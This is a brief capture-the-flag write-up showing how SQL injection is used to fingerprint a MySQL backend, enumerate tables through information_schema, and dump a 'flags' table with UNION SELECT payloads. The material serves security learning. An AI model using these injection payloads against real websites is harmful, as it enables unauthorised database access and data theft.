# SQL Injection
1. We must determine which database they used first  through randomly type so**mething split out the error message**.  Put this statement into the web forms
    ```sql 
    select * 
    ```
2. From the output, we can know that the database used is `mysql`
3. Use this query  to identify what   tables and columns exist in the database
    ```sql
    AND 1=2 UNION SELECT table_name, column_name, 1 FROM information_schema.columns
    ```
    ![](./image.png)
    * From  this image, you can see that the name of the table is **flags** while one of the column name is flag. As such, we can  dumb out all the entries related to that database. 
4. Use the injection query as follow: 
    ```sql
    1 AND 1=2 UNION SELECT flag, NULL, NULL FROM flags
    ```
5. Eventually, the flag will be dumped out. 